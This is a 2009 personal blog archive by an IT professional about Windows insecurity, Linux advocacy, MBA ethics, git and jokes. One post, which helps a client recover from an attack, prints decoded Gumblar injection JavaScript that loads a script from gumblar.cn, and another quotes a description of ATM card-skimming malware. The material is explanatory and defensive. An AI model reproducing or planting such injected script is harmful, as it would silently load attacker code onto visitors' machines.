Nice job, guys.  Great business model.

Oh and for people who think this is not MS's fault, follow at least this link in the article... (ignore the comments, they're mostly crap.  Even in the article, there are only facts or questions, so you can certainly draw your own conclusions, don't go by his).

And what really, really, REALLY, pisses me off is that no mainstream news media reporting this will use the words "Microsoft" or "Windows" when describing the problem, leaving ordinary (non-IT) folks with the impression that this happens to all "computers".  Other people far more qualified than I have also noticed and ranted about this, but it makes no difference.  Damn...

2009-06-29

who's to blame?

http://thedailywtf.com/Articles/Death-by-Delete.aspx

interesting story.  I don't know how many readers I have (or still have, after that article on MBAs and ethics ;-) but I'm torn as to whom to blame for this.

Opinions?

2009-06-28

what are they all mourning?

I find it hard to digest all this mourning for Michael Jackson.  The "King of Pop" with the pulse-pounding beats and act died long ago; the person who died on Friday was no more than a shadow of his former self, and a dark, dangerous, shadow at that.  Mentally unstable, physically ravaged, and accused of probably the worst sort of crimes that a parent can imagine, I am so happy that my two children hardly know who he is.

Humans tend to hang on to their idols long after the idols have been found wanting.  Until we stop doing that, celebrities will continue to get away with murder, at least figuratively, if not literally.

2009-06-19

Re your column on "Courtesy crisis at workplace"

Dear Mr Banerjee,

I read your column in today's DC, Hyderabad edition.  I normally don't bother writing letters to editors or columnists, but there are some things I have strong feelings about, and then I have to.  I have no idea if there is any scope in your column for you to print your reader's comments, but that is upto you.

Linking the failure of Lehman or AIG with the informal culture of a US company, and conversely the success of the Tatas and Birlas with the opposite, is naive, to say the least.  Correlation does not, as they say, imply causation.

The correct causation for your examples is simple: all the failed companies you mention have ethics problems at the top.  All of them are run by MBAs who have been taught a badly skewed value system, one which maximises either their own, or their company's, worth in purely monetary terms.  I do not believe MBAs are even taught the basics of ethics or morality.  It's just not one of their priorities.  How else can we explain the dean of ISB brazenly voting for something that an average man on the street could easily see was unethical!

[You may wish to read http://www.timesonline.co.uk/tol/news/uk/education/article5821706.ece -- though it is directed at Harvard, I suspect most B-schools are the same anyway]

In contrast, if you take the people you've named (Tatas, Birlas, etc)., they all have a highly developed sense of ethics at the top levels, even a sense of "ownership".  Perhaps it comes from the fact that the firm carries their name!  Similarly, the old guard at Lehman would have had the same values too.  But they have long since given way, (due to pressures on the "Street" perhaps?) to the MBA crowd.  With the results we all see today.

Of course, it is certainly true that "old guard" people also tend to be more formal, that is quite a different matter entirely.

Warm regards,

Sitaram

PS: I work for a large IT company, I have nearly 23 years of experience, and I insist that everyone, even the freshers, call me Sita or Sitaram.  And I don't like people who insist on being called "Sir" or "Mr ..." or whatever.  It means their notion of "respect" is very shallow, and (often enough), also that they lack the ability to actually earn my respect anyway.

Of course, this means I have to work a little harder to uphold my dignity and authority.  Once in a while someone will mistake my attitude for weakness and take liberties, or cross some other invisible line, and will need to be pushed back firmly.  I have to be constantly on the watch for such issues.

Why then do I do this?  Would it not be better to "act my age"?  After all, some of my team members are barely a few years older than my son!

Because it helps them open up.  Even in a formal meeting, being able to call me Sita gives them just that extra bit of confidence to tell me what they really think of something I am proposing, or seconding.  It helps them say "Sita, I don't think that would work".  It gets them asking just that one extra question that tells me something is wrong, or has been misunderstood, or points to a problem the project will have way down the line.  In short, it gets me feedback I'd never have got otherwise, or would have to guess at from other signals or behaviour.

And yes, I have gone drinking with people who report to me and are very junior to me.  It's not that difficult to be one of the lads without all the negative fallout you seem to impute to it.  You just have to be fair, honest, and firm.

2009-06-11

Malware Steals ATM Data

...all you Linux people think you're safe from us?

MUA-HA-HA-HA!

via Schneier on Security by schneier on 6/10/09

One of the risks of using a commercial OS for embedded systems like ATM machines: it's easier to write malware against it:

The report does not detail how the ATMs are infected, but it seems likely that the malware is encoded on a card that can be inserted in an ATM card reader to mount a buffer overflow attack. The machine is compromised by replacing the isadmin.exe file to infect the system.

The malicious isadmin.exe program then uses the Windows API to install the functional attack code by replacing a system file called lsass.exe in the C:\WINDOWS directory.

Once the malicious lsass.exe program is installed, it collects users account numbers and PIN codes and waits for a human controller to insert a specially crafted control card to take over the ATM.

After the ATM is put under control of a human attacker, they can perform various functions, including harvesting the purloined data or even ejecting the cash box.

2009-05-23

(malware) walk too loudly...

Well there you have it, straight from the horse's mouth :-)

http://www.infoworld.com/d/windows/your-companys-apps-incompatible-windows-7-shim-them-says-microsoft-394

Microsoft has long created its own shims rather than making laborious bug fixes to Windows' oft-brittle code.

"If you walk too loudly down the hall near the [Windows] kernel developers, you'll break 20 to 30 apps," Jackson joked.

2009-05-22

linux users are missing all the fun :-)

http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/

  • Steals FTP credentials
  • Sends SPAM
  • Installs fake anti virus
  • Highjacks Google search queries
  • Disables security software

2009-05-14

why open source is important...

http://www.schneier.com/blog/archives/2009/05/software_proble.html

quoted verbatim from Bruce Schneier's blog (link above).  I hope he doesn't mind -- I'm doing this because this is really important, and I know some of my readers don't click on links (you know who you are!)

----------------------------

Software Problems with a Breath Alcohol Detector

This is an excellent lesson in the security problems inherent in trusting proprietary software:

After two years of attempting to get the computer based source code for the Alcotest 7110 MKIII-C, defense counsel in State v. Chun were successful in obtaining the code, and had it analyzed by Base One Technologies, Inc.

Draeger, the manufacturer maintained that the system was perfect, and that revealing the source code would be damaging to its business. They were right about the second part, of course, because it turned out that the code was terrible.

2. Readings are Not Averaged Correctly: When the software takes a series of readings, it first averages the first two readings. Then, it averages the third reading with the average just computed. Then the fourth reading is averaged with the new average, and so on. There is no comment or note detailing a reason for this calculation, which would cause the first reading to have more weight than successive readings. Nonetheless, the comments say that the values should be averaged, and they are not.

3. Results Limited to Small, Discrete Values: The A/D converters measuring the IR readings and the fuel cell readings can produce values between 0 and 4095. However, the software divides the final average(s) by 256, meaning the final result can only have 16 values to represent the five-volt range (or less), or, represent the range of alcohol readings possible. This is a loss of precision in the data; of a possible twelve bits of information, only four bits are used. Further, because of an attribute in the IR calculations, the result value is further divided in half. This means that only 8 values are possible for the IR detection, and this is compared against the 16 values of the fuel cell.

4. Catastrophic Error Detection Is Disabled: An interrupt that detects that the microprocessor is trying to execute an illegal instruction is disabled, meaning that the Alcotest software could appear to run correctly while executing wild branches or invalid code for a period of time. Other interrupts ignored are the Computer Operating Property (a watchdog timer), and the Software Interrupt.

Basically, the system was designed to return some sort of result regardless.

This is important. As we become more and more dependent on software for evidentiary and other legal applications, we need to be able to carefully examine that software for accuracy, reliability, etc. Every government contract for breath alcohol detectors needs to include the requirement for public source code. "You can't look at our code because we don't want you to" simply isn't good enough.


2009-05-12

advice to someone recovering from an attack

Dear <deleted>,

on <deleted>, <deleted> wrote:

Dear Sitaram,

Thanks again for taking time for us.
This is really helpful info and as we have discussed FTP and compromised client PC's seems to be the culprit.

We have taken following steps:

<deleted specifics of Windows protection measures taken, as well as remote access changes>

It will be very helpful if you can help us to formulate and implement an IT security guide line.

Sorry for a long-winded, rambling, reply, but basically, a guideline cannot be created just like that.  You'll have to take the basic assumption (which is: if it is possible, it will happen!), and use that to pinpoint all the places where you can get attacked, and then come up with a plan.  With that caveat, here're some random thoughts in response to your email.

(1) Taking all those steps to protect windows is good but at the end of the day it is basically insecure.  The legacy of "one user per machine" is deep inside Windows, and cannot be easily overcome.  Linux and other Unixes (FreeBSD, NetBSD, Solaris/OpenSolaris, etc) -- while apparently more difficult -- start with the multi-user mentality, which is inherently more secure (see footnote).

The sooner people realise this and move on, the better.  When I find a Windows dependency, I take it as a sign that the other thing, (not I), has to change.  If I can change it, I will.  If I cannot, I put Windows in a Virtual Machine running inside Linux, make sure all data on Windows is transient, and rollback the virtual machine once a week or so.  No virus can get past that :-)

(2) Most of the problems come from the web.  All your Symantec protection may not be sufficient to detect if your web browser is silently going to a malware host like gumblar.cn.  How do you know that it isn't doing so?  You can test this one because you know about it.  How will you test all the others that you don't know?

(3) AV companies are, by nature, reactive.  You are paying for the hope that (i) they discover the bad site, (ii) update their signatures, and (iii) let you download the updates, all of this before the bad site discovers you!  This is difficult.  Most people who say "I never got hacked" don't realise that this is only by pure chance!

(4) The best security policy is one that assumes you will be attacked.  Let me give you a somewhat extreme example: here's how I deal with it.

  1. I run Linux everywhere, and Windows restricted only if absolutely needed as described above.
  2. Even in Linux, Firefox is not immune to Javascript hacks.  Most of the hacks coming through JS are directed at exploiting Windows holes, but I assume there may be some unknown Linux one also somewhere (nothing is perfect you know!)  So I do my normal browsing as some other user (a very "no rights" userid called "ff" I created just for firefox).  Pubkey auth allows "sitaram" to run ssh commands as "ff", so typically my firefox will start as "ssh ff firefox" instead of "firefox".  The setup is one-time, and very easy.
  3. This means, even if someone compromises my firefox browser, he only gets access to that userid (which contains no files of any real use), not "sitaram" (which is where all my files and email etc are).
  4. Even then, I run with NoScript and AdBlockPlus, enabled.  By default, no site gets JS on my browser.  Normally, if a site insists on JS, I mentally thank them for saving me some time and move on :-)  If I need that site more than it needs me, then I allow JS on that site.  Temporarily.  NoScript makes this very easy.
  5. The "sitaram" userid never runs a web browser except to specific sites (like my company intranet portal, and my bank, irctc for train tickets, etc).  Basically, anything that has personally/financially important info runs from this userid, all general browsing (including slashdot, for example) runs from the other id.  This is far more separation than Chrome can give you; it's two completely different users, in an OS that (as I said before) knows how to separate users properly.
  6. Both firefoxes are set to delete all data except browsing history when the browser closes, and never to save passwords.  That's a one time preference setting.  Like the old Hero Honda ads used to say, fill it, shut it, forget it :-)
  7. No two sites I log onto have the same password or even similar password.  This is a tough one in practice, I agree, but it has to be done.  If someone manages to find out your yahoo password they should not be able to gain access to your gmail :-)
  8. People say "you should never write down passwords".  Bullshit.  You can safely write down subtle hints/reminders or simple variations with extra noise etc. -- just sufficient to refresh your memory.  It's a lot easier to protect a physical thing (a piece of paper in your wallet) than the stuff you can't see.  In my case, the people who have physical access to my wallet are people I already trust or who will never make any sense out of a random set of meaningless characters.  This is a lot safer than using the same password for unrelated sites because you find it difficult to remember so many!

OK enough rambling.  But you cannot imagine how much all of this will protect you compared to all the reactive Symantec style stuff.  Of course, if (for example), icicibank.com gets infected by the gumblar.cn style attack, then I have a big problem!  I'll talk later about how one can protect against that.

I hope I have given you some food for thought.  We can talk about this in more detail later this week, if you wish.

Regards,

Sitaram

(*)  Why are they inherently more secure?  They start with the assumption that each user, and the OS itself, must be protected from the other users' actions.  Although recent Linux distributions have diluted this a bit to cater to the Windows crowd, the basic premise is still the same and still works.




Sitaram Chamarty wrote:
Dear <deleted>,

The base 64 coded stuff in the first file decodes to an obfuscated Javascript, which -- when again decoded -- becomes:

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//gumblar.cn/rss/?id="+j+">

The second file has similar obfuscated JS; at a quick glance, (and knowing some of the hex codes of ASCII characters) it looks the same as the previous one, and in particular does have "gumblar.cn" in it.

So, we have "gumblar.cn".  A quick google on that gives me a lot of stuff, in particular http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/ which bears out my initial estimate that this happened due to insecure ftp.  I strongly suggest you go through that entire page asap, especially the comment  http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/comment-page-1/#comment-916

http://www.bleuken.com/2009/05/06/removal-and-prevention-of-gumblarcn-infection/ and others also say that infection starts from the local PC used to upload.

Seriously, if you don't need Windows, ditch it.  Ditch it for all but the most needed functions, and keep them air-gapped (meaning they pass data onto a bastion host running Linux, the stuff gets checked there -- visual inspection of all code if needed -- and then it moves from there using only pubkey access to the server).

And really, any hosting provider who does not give you ssh access should be out of business.  This is 2009 :-)

Regards,

Sitaram

2009-05-06

gratuitous Javascript

Someone sent me a link to an article on indiatimes.com, especially pointing out something about the comments.  My reply:

---------------------

I can't see any comments; they are obscured by needless, meaningless, gratuitous, Javascript.

The amazing thing is that the comment leaders load along with the main page.  They're just not **visible** unless you have JS turned on.  In other words, they made an effort to **actively hide them** unless you have JS turned on -- it wasn't just an artefact of whatever brain dead web development software they're using.

My policy on JS is this: if I absolutely **must** use the site (like my bank, railway reservations, bill payments, and Ultamatix) I will turn it on.  Otherwise, a site that requires JS can do without my viewership and patronage.

And I most certainly will **not** switch on Javascript for a fluff rag like the TOI.  What happened once can happen again.

2009-05-03

so this is how they get their jollies...

do the terrorists know their religion is being side-tracked?

http://yro.slashdot.org/comments.pl?sid=1218935&cid=27788361

Oh and if you think this is unsubstantiated, just google for it using some appropriate keywords; you'll find plenty of corraboration.

2009-04-21

truecrypt and it's dangerous license

http://article.gmane.org/gmane.comp.freedesktop.distributions/275

Note especially the last few paras, in particular, "Our counsel advised us that this license has the appearance of being full of clever traps, which make the license appear to be a sham (and non-free)."  That's pretty strong language for a lawyer to make!  Also read the analysis of the simple clause: "NOTHING IN THIS LICENSE SHALL IMPLY OR BE CONSTRUED AS A PROMISE, OBLIGATION, OR COVENANT NOT TO SUE FOR COPYRIGHT OR TRADEMARK INFRINGEMENT"

My advice: use the normal Linux mechanisms -- dm-crypt, cryptsetup, and LUKS.

Forget about plausible deniability -- that's a load of fertiliser these days, since that feature has been touted so often in so many fora that the fact that you have truecrypt installed can mean they ask you for your second password :-)

If you're on Windows, buy a commercial license (although I suspect that may also have the same clause in it!), or use some competing product, or forget about encryption.

Or use Windows bitlocker :-)  Your data will be very safe.  If your hardware changes in any way, it will be safe even from you :-)

2009-03-31

python moves to Hg (surprise!)

No surprise, but here's has a real surprise:

quote: As git proponent, I had placed some comments in the usage scenarios explaining what was happening, and got a *lot* of pushback.  The basic workflow should involve *no* thought *at all*, that was a common position.  Even comments on theory of operation are a bad sign.  The closer the workflow scenarios approximated "no change in thinking" (== no thought at all in the ideal), the better.  People didn't even care to find out if it *was* complex, the mere scent of complexity put them off.
wow...!  Why even bother to convert from SVN then?  As someone who's trying to propagate git in $DAYJOB, I can understand this sort of reaction, but from a FOSS project?

And I didn't see a rebuttal of this post in the rest of the thread either...

2009-03-30

(MBA) 360 Degree Feedback Survey for someone joining ISB

I did someone's "evaluation" for admission into ISB (actually the person has already got admission so this is somewhat less critical).

One of the questions was: "To sum up, what advice would you have for this individual on becoming more effective as a leader?".  Now, the person in question is a very soft-spoken, unaggressive, person (as far as I can see -- I could be wrong), so here's what I wrote:

My answer:  as an MBA, he may be called upon to take decisions that he will later have to defend (like perhaps why he voted a certain way in a certain board meeting ;-)  Even if he's right, he has to be able to defend his stance against more outspoken people.  Defending himself if he's actually wrong could be the next step.

:-)

B-schools don't teach ethics anyway, so hopefully they have at least developed a thick skin...

2009-03-26

(funny quote) Dorothy Parker on some book...

"This is not a novel to be tossed aside lightly. It should be thrown with great force."

2009-03-24

(standards/drivers) new hardware and linux

http://blogs.gnome.org/dcbw/2009/03/20/thats-when-i-reach-for-my-revolver/

This is a very entertaining article on why your new hardware sometimes doesn't work in Linux, written by one of the guys in charge of the "NetworkManager" applet.

Even if you're not a techie, you can still read it to get a flavour for the kind of problems these guys have supporting the same basic thing in a dozen different ways!

2009-03-23

(funny) six of one and a half-dozen of the other

via Jokes2Go Daily Humor on 3/21/09

Recently, when I went to McDonald's. I saw on the menu
that you could have an order of 6, 9 or 12 Chicken
McNuggets. I asked for a half dozen nuggets. "We
don't have half dozen nuggets", said the teenager at
the counter. "You don't?" I replied. "We only have
six, nine, or twelve," was the reply "So I can't
order a half-dozen nuggets, but I can order six?"
"That's right." So I shook my head and ordered six
McNuggets.

2009-03-20

(funny) Look Out, Firefox 3 --- IE8 Is Back On Top For Now


All alone
by AKAImBatman (238306)

IE8 Is Back On Top For Now

You know that kid who rushes to the top of the hill, just knowing that he's finally going to win King of the Hill for the first time ever? Then when he gets to the top of the hill, he's elated when he realizes he's at the top... only to realize a few moments later that all the other kids ran up a different hill?

That's Microsoft.

2009-03-16

(standards) differences between IE7 and IE8

Apparently spurred by the imminent release of Internet Explorer 8, Microsoft's IE Team has published a list of differences between IE7 and IE8, and how to fix code so that it will work on both: http://blogs.msdn.com/ie/archive/2009/03/12/site-compatibility-and-ie8.aspx

And if you know someone who still (even today) needs proof that the existing IE 7 and below were grossly non-compliant to standards, pass this on to them too.

They don't need to understand HTML or JS or the DOM to appreciate this. This MS blogger is quite honest and upfront about it. Here's a quote; note the repeated use of the phrase "Standards mode", and their recommendation of the "best option in the long run" :-)

We see the majority of compatibility issues in IE8 Standards Mode. Most of these occur when sites expect legacy behavior that no longer exists in IE8 Standards Mode. Upgrading your site to run in IE8 Standards Mode is the best option in the long run, but in the interim you can quickly fix these types of issues by running your site in Compatibility Mode.

2009-03-12

(MBA) 3 letters to hell -- Masters of the Business Apocalypse

The best thing I learnt today: that George W Bush had an MBA from Harvard -- he is in fact the only US president to have an MBA, thus proving forever that MBAs (at least from Harvard) are worse than lawyers from anywhere. All lawyer jokes shall henceforth be treated with the following perl recipe:

perl -i -e 's/lawyer/Harvard MBA/gi'

----------------------------

other expansions of "MBA" from http://www.timesonline.co.uk/tol/news/uk/education/article5821706.ece :

Mediocre But Arrogant
Mighty Big Attitude
Me Before Anyone
Management By Accident

----------------------------

One quote from the article reflects what I have been saying all along, that MBAs are not taught ethics.

During my time at the school, 50 students were chosen to participate in a detailed survey of their development. Scott Snook, the professor who ran it, reported that about a third of students were inclined to define right and wrong simply in terms of what everyone else was doing. "They can't really step back and take a critical view," he said. "They're totally defined by others and by the outcomes of what they're doing."
When I asked someone how the dean of ISB would explain to his students why he voted the way he did on Dec 16th or thereabouts, the answer I got "what's to explain? The word 'Ethics' starts with a Z in the MBA dictionary...". (I'm not telling you who said this to me; he was not an MBA anyway)

----------------------------

A personal note. A few people I personally love very much are MBAs. You know who you are. You (and I) know what your job is and that it is nothing remotely like the stuff described in that article.

2009-03-10

2009-03-03

(git) sourceforge and git

In a very interesting move, sourceforge, which till now only supported Subversion (SVN), is now supporting git-hosted projects.

http://apps.sourceforge.net/trac/sitedocs/wiki/Git

Just in case it isn't obvious, Sourceforge is owned by collabnet -- the people behind...

[scroll down for the answer]
































































...SVN :-)

2009-02-27

(funny,wow) a phone that you can dump into boiling coffee and it still works?

http://www.reghardware.co.uk/2009/02/26/review_mobile_phone_sonim_enduro_xp3/print.html

But the really funny part was this quote:

"However, don't expect to listen to music on the Enduro despite the
volume attainable: the MP3 player lacks any kind of recognisable
interface, even the hardware volume buttons don't work with an MP3. When
questioned about the lack of interface, the chaps from Sonim expressed
surprise that the handset had any MP3-playback capability at all. Bonus!"

2009-02-17

(funny) rouge routers

someone posted a comment where he talked about a rouge (sic) router causing connectivity problems. The predictable result:

http://tech.slashdot.org/comments.pl?sid=1130227&cid=26880003

2009-02-14

(malware) high blood pressure

http://blog.linuxtoday.com/blog/2009/02/i-give-up-peopl.html

...a tech-journo gets high blood pressure. I would be in the same situation, but I'm slowly learning to take a somewhat detached view. I'll protect my stuff, help anyone who asks, but otherwise stay out of the way. Stick to local evangelism, forget about global evangelism.

This change of heart sponsored by the enormous amount of cluelessness around me. Carla gave up today. I gave up approximately 2 weeks ago.

fz-uubss

2009-02-13

(funny,quote) what can go wrong?

The major difference between a thing that might go wrong and a thing which cannot possibly go wrong is that when a thing that cannot possibly go wrong goes wrong it usually turns out to be impossible to get at or repair

-- Douglas Adams

(malware) Microsoft announces $250,000 Conficker worm bounty

I guess it's a lot cheaper than fixing the security of your own products... :-)

- why should a desktop have RPC and other ports open by default?
- why design a system where even a 'local administrator' cannot fix something (see http://isc.sans.org/diary.html?storyid=5842 )?
- and most importantly, why oh why does autorun.inf execute even for USB sticks?

http://www.networkworld.com/news/2009/021209-conflickr-bounty-microsoft.html

Quote: "By combining our expertise with the broader community, we can expand the boundaries of defense to better protect people worldwide," said George Stathakopoulos, general manager of Microsoft's Trustworthy Computing Group.

Translation: we have no clue how to deal with this without admitting we screwed up bigtime, and by co-opting all of you, we can pretend it's not really our fault.

2009-02-11

(git) git grep

came up in my RSS feed earlier today... pretty powerful stuff

http://gitster.livejournal.com/27674.html

...and most of the power is nothing to do with version control per se
(except the aspect of grepping for stuff in older revisions)

2009-02-09

(MBA) a salesman speaks

I agree that socialising may lead to conceptualising. Maybe even, if you get (un)lucky -- pardon the mild salacity -- conception :-) But how do you "socialise a concept"?

It seems to me that, compared to sales guys, we lead such dull, drab, humorless lives. We write programs and think we're creating something. They change the very language in which we communicate, pulling the rugs from under our collective feet. And most of us don't even know it. Only a very few are even privileged to be in their presence, and that too by the most tenuous of connections -- a phone call.

Truly, they are masters of their destiny. And ours too...

God help us.

-------- Original Message --------


<deleted> and I will socialize this concept with these people and see when and how we can set up a possible workshop with

2009-02-07

(funny) Gates Releases more bugs into the world?

To highlight malaria awareness, Bill Gates apparently
released a bottle full of mosquitos at TED recently.

TED curator Chris Anderson joked that when the video is
posted on the TED website, it would be headlined "Gates
releases more bugs into the world."

http://www.theregister.co.uk/2009/02/05/gates_mosquitoes_ted_conference/

(criminal,malware) must have been my brother in some past life...

...well except for the little bit about Church of GNU anyway

http://tech.slashdot.org/comments.pl?sid=1117843&cid=26745339

2009-02-03

(criminals,malware) still don't feel like installing Linux?

Yes, gentle readers, we finally have a genuine swear word on this blog, not that namby-pamby "fsck" mis-spelling I trot out when I'm upset, so here goes...

The bastards at Microsoft have sunk to a new low.

If you're running Windows and have auto-update on, and you use firefox (because you know IE is full of holes), this is what you got some time ago:

- a firefox add-on you never asked for, from Microsoft, not from Mozilla
- which installs itself without asking, as part of Windows update
- and won't uninstall without forcing you to go into the registry editor

So -- if you installed firefox because it was more secure than IE -- MS has a plan to make sure FF is as fscked as IE is.

At least on Windows.

And please, for MS apologists: it doesn't matter *what* the fscking extension is actually doing. The fact that MS can

- install something onto a competing product
- without the user's permission, and
- (bonus) make it hard to uninstall without regedit

all adds up to an enormous amount of arrogance. You may have paid for your computer, but you don't actually own it -- they do.

Listen up guys, I've said this before and I'll say this again, loud and clear. AT LEAST ON YOUR HOME MACHINES, PLEASE INSTALL AND USE LINUX!! I'll help -- call me. I'll do anything to help people install and use it.

Some links:

2009-02-01

(malware) Interview with an Adware developer

http://www.schneier.com/blog/archives/2009/01/interview_with_10.html

quote from linked article:

I should probably first speak about how adware works.
Most adware targets Internet Explorer (IE) users because
obviously they're the biggest share of the market. In
addition, they tend to be the less-savvy chunk of the
market. If you're using IE, then either you don't care
or you don't know about all the vulnerabilities that IE
has.

2009-01-23

(photography) Long Exposure Photography: 15 Stunning Examples

http://digital-photography-school.com/long-exposure-photography

(git) must read article on git

http://www.theregister.co.uk/2009/01/21/git_gaining_ground/print.html

Please ignore the bad language; El Reg is not known for being "business like", but they know their stuff.

Some quotes:

  • Many enterprise developers just saw git's popularity as open source programmers suckling from the teat of Linus, but it kept growing. Programmers started to use git for their side projects and got hooked.
  • Git is gaining traction because given all other source control systems out there, git is the superior technology.
  • Developers will almost always select the best technology, and management must be dragged along kicking and screaming. It's no surprise that while git is making some headway in the enterprise, sometimes it's very under-the-radar and slow going.
  • You can use git to manage all the source code on your machine, and to keep the PHBs happy, commit your finished product to Subversion without actually using Subversion. This "guerrilla git' movement is springing up around the world, as developers see the productivity boost they can gain, but don't want to undo it with a productivity loss in convincing the company to officially switch to git.
  • So, if you're a developer and you haven't seen git before, there's a good possibility that you'll get a first hand demonstration when it starts to invade your company. If you like it, chances are it will help you get more work done in less time.

2009-01-13

(malware,office) Forrester: Companies use Word out of habit, not necessity

http://pcworld.idg.com.au/article/272644

lovely article!

The value of a high-priced analyst firm like Forrester is that, while
you can state the obvious as well as they can, no one listens when you do.

:-)

2009-01-12

(standards) Microsoft disables automatic IE 8 downloads

Last week someone was saying that many current Windows-based, client-server, applications using a proprietary front-end called IE, might be forced to upgrade and actually become what they currently only claim to be -- proper "web applications".

And then along comes this, to dash all hopes:

http://www.theregister.co.uk/2009/01/07/internet_explorer_8_blocker/

Especially note:

In a sign of the scale of the problem, Microsoft said the IE 8 Blocker does not have an expiration date. That means that until there's an official change of policy by Microsoft, users will not be getting IE 8 by default and will need to go on installing the software themselves.

2009-01-07

(social malware) Fwd: Birthday request

On Wed, Jan 7, 2009 at 2:32 PM, <deleted> <do_not_reply@perfspot.com> wrote:
> I'm using a new service to keep track of the birthdays for my friends and
> family. Please click the link and enter your birthday for me.
>
> http://perfspot.com/b.asp?e=sitaramc%40gmail%2Ecom
>
> Thanks for your help.
>
> <deleted>

As a security guy, my first thought is that this is probably a scam to get lots of people's birthdays. Even if it is not *created* as a scam, all it takes is for someone to hack into their servers and get all that data.

Do you know that, in the US at least, I can get a credit card in your name by knowing only
- your full name
- your DOB
- and your SSN?

OK, we in India are a little behind, but not that far off, and the awareness is much less.

So, sorry -- even if you *know* my birthday, please do not put it on any online service to "remind you" of it.

I will not feel bad that you did not wish me, I promise :-)

2009-01-05

(malware bugs) Zune hang explained...

Recently a Microsoft eqvt of the "iPod" (called the Zune), was found to
hang if it was booted on December 31st of 2008. The only solution was
to let the battery die, wait for the next day, and then reboot.

You'd think the cause might be something complex, deep in some really
arcane bit of the software, right?

Wrong! It's a piece of code that is so utterly simple even first year
college kids barely starting "C" should be able to understand the problem.

http://www.aeroxp.org/2009/01/lesson-on-infinite-loops/ explains the
cause of the hang is very nicely. The actual code is very simple: given
the "number of days since Jan 1, 1980" as input, return the current year
and the day-number within the current year. That's it. It even has a
helper function called "IsLeapYear()" to help it decide, so it's a very
simple, short, piece of code. Yet it got it wrong...

(git) one of the best responses on git versus svn I ever saw

http://developers.slashdot.org/comments.pl?sid=1079921&cid=26321869

explains a DVCS workflow really well, including the common question of "how do we control things if everyone has their own repo?"

2009-01-01

(funny,quote) The Berkeley of Linux...

I love this quote: "...the Debian project is the Berkeley of Linux: twice as many opinions as people, and four times as loud..."

[It's from http://www.linuxtoday.com/news_story.php3?ltsn=2008-12-31-022-35-OP-DV but I must say I'm a little ambivalent on the issues raised in there; need to dig deeper into the background before I make up my mind.]